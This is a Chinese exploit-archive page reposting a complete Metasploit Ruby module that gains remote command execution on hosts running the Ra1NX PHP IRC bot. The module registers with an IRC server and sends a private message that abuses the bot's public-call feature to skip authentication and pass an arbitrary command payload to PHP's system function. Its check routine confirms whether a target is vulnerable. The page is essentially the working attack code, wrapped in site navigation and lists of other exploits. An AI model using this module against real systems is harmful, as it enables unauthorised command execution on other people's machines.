首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Ra1NX PHP Bot Authentication Bypass Remote Code Execution
来源:metasploit.com 作者:bwall 发布时间:2013-03-26  
# Exploit Title: "Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution
# Date: March 24, 2013
# Exploit Author: bwall
# Software Link: https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0
# Version: v2.0
# Tested on: Ubuntu

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => '"Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution',
			'Description'    => %q{
					This module allows remote command execution on the PHP IRC bot Ra1NX by
					using the public call feature in private message to covertly bypass the
					authentication system.
				},
			'Author'         =>
				[
					'bwall <bwall[at]openbwall.com>' # Ra1NX analysis and Metasploit module
				],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					['URL', 'https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot'],
					['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0'],
					['URL', 'http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b']
				],
			'Platform'       => [ 'unix', 'win'],
			'Arch'           => ARCH_CMD,
			'Payload'        =>
				{
					'Space'    => 344,
					'BadChars' => '',
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
						}
				},
			'Targets'  =>
				[
					[ 'Ra1NX', { } ]
				],
			'Privileged'     => false,
			'DisclosureDate' => 'March 24 2013',
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(6667),
				OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
				OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),
				OptString.new('RNICK', [true, 'Nickname of Target IRC Bot', 'jhl1']),
				OptString.new('PHP_EXEC', [true, 'Function used to call payload', 'system'])
			], self.class)
	end

	def check
		connect

		response = register(sock)
		if response =~ /463/ or response =~ /464/
			print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
			return Exploit::CheckCode::Unknown
		end
		confirm_string = rand_text_alpha(8)
		response = send_msg(sock, "PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @msg #{datastore['NICK']} #{confirm_string}\r\n")
		print response
		quit(sock)
		disconnect

		if response =~ /#{confirm_string}/
			return Exploit::CheckCode::Vulnerable
		else
			return Exploit::CheckCode::Safe
		end
	end

	def send_msg(sock, data)
		sock.put(data)
		data = ""
		begin
			read_data = sock.get_once(-1, 1)
			while not read_data.nil?
				data << read_data
				read_data = sock.get_once(-1, 1)
			end
		rescue EOFError
		end
		data
	end

	def register(sock)
		msg = ""

		if datastore['IRC_PASSWORD'] and not datastore['IRC_PASSWORD'].empty?
			msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"
		end

		if datastore['NICK'].length > 9
			nick = rand_text_alpha(9)
			print_error("The nick is longer than 9 characters, using #{nick}")
		else
			nick = datastore['NICK']
		end

		msg << "NICK #{nick}\r\n"
		msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"

		response = send_msg(sock,msg)
		return response
	end

	def ra1nx_command(sock)
		encoded = payload.encoded
		command_msg = "PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @#{datastore['PHP_EXEC']} #{encoded}\r\n"
		response = send_msg(sock, command_msg)
		return response
	end

	def quit(sock)
		quit_msg = "QUIT :bye bye\r\n"
		sock.put(quit_msg)
	end

	def exploit
		connect

		print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
		response = register(sock)
		if response =~ /463/ or response =~ /464/
			print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
			return
		end

		print_status("#{rhost}:#{rport} - Exploiting the Ra1NX bot...")
		ra1nx_command(sock)

		quit(sock)
		disconnect
	end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mitsubishi MX ActiveX Componen
·HP Intelligent Management Cent
·LiquidXML Studio 2010 ActiveX
·ActFax 5.01 RAW Server Buffer
·LiquidXML Studio 2012 ActiveX
·KNet Web Server Buffer Overflo
·IconCool MP3 WAV Converter 3.0
·Ruby Thumbshooter Gem 0.1.5 Re
·KingView Log File Parsing Buff
·Joomla Component JCE File Uplo
·Mutiny Remote Command Executio
·Konftel 300IP 2.1.2 Reboot Byp
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved